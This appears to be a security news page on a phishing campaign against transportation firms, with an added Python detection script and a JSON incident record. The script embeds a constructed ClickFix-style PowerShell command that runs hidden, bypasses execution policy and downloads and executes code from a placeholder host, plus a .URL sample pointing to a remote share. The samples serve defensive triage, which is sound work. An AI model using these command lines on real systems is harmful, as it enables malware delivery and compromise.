Samsara: Transportation Companies Hit by Cyberattacks Using Lumma Stealer and NetSupport Malware

New Phishing Campaign Targets North American Transportation and Logistics Firms

A sophisticated phishing campaign is targeting transportation and logistics companies across North America, delivering information stealers and remote access trojans (RATs) via compromised legitimate email accounts. Security firm Proofpoint identified the activity, which leveraged at least 15 breached accounts from shipping and transportation firms between May and August 2024.

The campaign initially distributed Lumma Stealer, StealC, and NetSupport, then shifted tactics in August, introducing new infrastructure and two further payloads, DanaBot and Arechclient2. Attackers used internet shortcut (.URL) attachments or Google Drive links leading to .URL files whose target pointed at a remote share, so opening the shortcut made Windows retrieve the malware over Server Message Block (SMB); SMB served as the delivery channel rather than being exploited. Some August variants employed ClickFix, a social-engineering technique that tricks victims into copying and running a Base64-encoded PowerShell command under the guise of fixing a problem displaying a document in the browser.
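The two delivery mechanics in the paragraph above, a .URL shortcut whose target is an SMB share and a ClickFix-style `powershell -enc` command, lend themselves to simple triage checks. The following is an added example, not code from Proofpoint or the article; the shortcut file, the 203.0.113.x addresses, the share name, the lure filename and the encoded script are constructed samples, and the function names are this example's own.

```python
"""Triage helpers for two delivery tricks: a .URL internet shortcut that
fetches its target over SMB, and a ClickFix-style 'powershell -enc' command.
Added example with constructed samples; none of these are real indicators."""
from __future__ import annotations

import base64
import re

# Constructed .URL sample (TEST-NET-3 address, invented share and filename
# mimicking the industry-software lures described in the article).
URL_SAMPLE = r"""[InternetShortcut]
URL=file://\\203.0.113.10\share\Samsara_Invoice.exe
IconIndex=13
IconFile=C:\Windows\System32\SHELL32.dll
"""

# file://\\host\share\x or \\host\share\x ; host may not be a drive letter.
UNC_RE = re.compile(r"^(?:file:)?[\\/]{2,}([^\\/]+)[\\/](.*)$", re.IGNORECASE)
DRIVE_RE = re.compile(r"[A-Za-z]:")


def parse_internet_shortcut(text: str) -> dict[str, str]:
    """Return key/value pairs from the [InternetShortcut] section of a .URL
    file. The format is INI-style and keys are case-insensitive."""
    fields: dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


def smb_target(url: str) -> tuple[str, str] | None:
    """If the shortcut target is a UNC path on a remote host, return
    (host, share_path); local paths, drive letters and http(s) give None.
    Opening such a shortcut makes the Windows shell reach the host over SMB."""
    m = UNC_RE.match(url.strip())
    if not m:
        return None
    host, rest = m.group(1), m.group(2)
    if DRIVE_RE.fullmatch(host) or host.lower() in ("localhost", "127.0.0.1"):
        return None
    return host, rest.replace("/", "\\")


def triage_url_shortcut(text: str) -> dict:
    """Flag a .URL file whose target would be fetched from a remote share."""
    target = parse_internet_shortcut(text).get("url", "")
    smb = smb_target(target)
    return {
        "target": target,
        "smb_host": smb[0] if smb else None,
        "smb_path": smb[1] if smb else None,
        "suspicious": smb is not None,
    }


# Constructed ClickFix-style command. The script body is inert text standing
# in for what a victim is told to paste into Win+R; it is decoded, never run.
_SAMPLE_SCRIPT = "iex (iwr -UseBasicParsing 'http://203.0.113.25/fix.txt')"
CLICKFIX_SAMPLE = ("powershell -w hidden -ep bypass -enc "
                   + base64.b64encode(_SAMPLE_SCRIPT.encode("utf-16-le")).decode())

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...); '-ep bypass' must not match, which the \s+ after the prefix ensures.
ENC_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
INDICATORS = ("iex", "invoke-expression", "iwr", "invoke-webrequest",
              "downloadstring", "frombase64string", "-w hidden", "-ep bypass")


def decode_encoded_command(cmdline: str) -> str | None:
    """Recover the plaintext of a 'powershell -enc' argument, which is
    base64 over UTF-16LE text. Returns None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def clickfix_indicators(cmdline: str) -> list[str]:
    """Indicators present in the command line or its decoded payload."""
    haystack = (cmdline + " " + (decode_encoded_command(cmdline) or "")).lower()
    return [tok for tok in INDICATORS if tok in haystack]


if __name__ == "__main__":
    print(triage_url_shortcut(URL_SAMPLE))
    print(decode_encoded_command(CLICKFIX_SAMPLE))
    print(clickfix_indicators(CLICKFIX_SAMPLE))
```

In practice the shortcut check runs over attachments extracted from mail, and the decoder over process-creation events (command lines of `powershell.exe` spawned by `explorer.exe`, which is what a Win+R paste produces); both only surface candidates for an analyst to look at.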

The phishing lures impersonated industry-specific software, including Samsara, AMB Logistic, and Astra TMS, suggesting attackers conducted prior research on targeted companies. The shift in payloads and techniques indicates an evolving threat landscape.

Separately, researchers at Palo Alto Networks Unit 42 uncovered a new version of RomCom RAT (SnipBot), a successor to PEAPOD (RomCom 4.0), distributed via phishing emails with malicious PDFs or disguised executables. SnipBot, previously linked to the Tropical Scorpius (Void Rabisu) threat group, now includes 27 commands, enabling file manipulation, process enumeration, SOCKS proxy setup, and data exfiltration. While past RomCom infections involved ransomware, recent activity suggests a potential pivot toward espionage rather than financial motives.

The campaigns highlight the growing sophistication of cyber threats targeting critical supply chain sectors.

Source: https://thehackernews.com/2024/09/transportation-companies-hit-by.html

Samsara cybersecurity rating report: https://www.rankiteo.com/company/samsara

{
  "id": "SAM1780527307",
  "linkid": "samsara",
  "type": "Cyber Attack",
  "date": "5/2024",
  "severity": "85",
  "impact": "4",
  "explanation": "Attack with significant impact, including customer data leaks"
}
{
  "affected_entities": [
    {
      "industry": "transportation and logistics",
      "location": "North America",
      "type": "transportation and logistics companies"
    }
  ],
  "attack_vector": [
    "compromised email accounts",
    "malicious attachments",
    "Google Drive links",
    "malicious PDFs",
    "disguised executables"
  ],
  "data_breach": {
    "data_encryption": false,
    "data_exfiltration": true,
    "personally_identifiable_information": true,
    "sensitivity_of_data": "high",
    "type_of_data_compromised": [
      "personally identifiable information",
      "sensitive business data"
    ]
  },
  "date_detected": "2024-05-01",
  "date_publicly_disclosed": "2024-08-01",
  "description": "A sophisticated phishing campaign is targeting transportation and logistics companies across North America, delivering information stealers and remote access trojans (RATs) via compromised legitimate email accounts. The campaign initially distributed Lumma Stealer, StealC, and NetSupport, then shifted tactics in August, introducing new infrastructure and the payloads DanaBot and Arechclient2. Attackers used internet shortcut (.URL) attachments or Google Drive links leading to malicious files that fetched malware from remote servers over Server Message Block (SMB). Some August variants employed ClickFix, a technique tricking victims into executing a Base64-encoded PowerShell script under the guise of fixing browser document display issues. The phishing lures impersonated industry-specific software, including Samsara, AMB Logistic, and Astra TMS. Separately, researchers uncovered a new version of RomCom RAT (SnipBot), distributed via phishing emails with malicious PDFs or disguised executables, now including 27 commands for file manipulation, process enumeration, SOCKS proxy setup, and data exfiltration.",
  "impact": {
    "data_compromised": true,
    "identity_theft_risk": true
  },
  "initial_access_broker": {
    "entry_point": [
      "compromised email accounts",
      "phishing emails"
    ]
  },
  "investigation_status": "ongoing",
  "motivation": [
    "espionage",
    "financial"
  ],
  "post_incident_analysis": {
    "root_causes": [
      "phishing",
      "payload retrieval over SMB from attacker-controlled shares",
      "ClickFix social engineering",
      "malicious attachments"
    ]
  },
  "references": [
    {"source": "Proofpoint"},
    {"source": "Palo Alto Networks Unit 42"}
  ],
  "response": {
    "third_party_assistance": [
      "Proofpoint",
      "Palo Alto Networks Unit 42"
    ]
  },
  "threat_actor": [
    "Tropical Scorpius (Void Rabisu), for the RomCom/SnipBot activity only; the transportation campaign is unattributed"
  ],
  "title": "New Phishing Campaign Targets North American Transportation and Logistics Firms",
  "type": [
    "phishing",
    "malware"
  ],
  "vulnerability_exploited": [
    "none reported; SMB payload retrieval and ClickFix are abused techniques, not software vulnerabilities"
  ]
}